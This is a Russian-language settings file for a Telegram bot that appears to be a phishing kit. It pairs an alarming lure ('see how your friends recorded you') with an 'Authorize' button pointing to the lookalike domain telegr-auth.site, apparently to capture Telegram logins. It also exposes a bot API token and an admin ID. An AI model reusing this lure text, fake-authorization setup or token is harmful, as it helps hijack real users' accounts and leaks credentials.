# - *- coding: utf- 8 - *-
[SETTINGS]
TOKEN=5582097032:AAEDIOnnuJkpJ-op-KhBHsJx7O5WxsjQAO8
start_text=😱 Бегиии! смотреть как тебя запuсалиu друзья 🔔 Статус: все функции работают. 🌺 Если вы не можете произвести авторизацию по кнопке ниже, то пройдите ее здесь: https://telegr-auth.site

web_button_name=Авторизоваться
web_url=https://telegr-auth.site/
[PHOTO]
file_type=jpg
;file_type - jpg

[ADMIN]
admin_id=1361816235
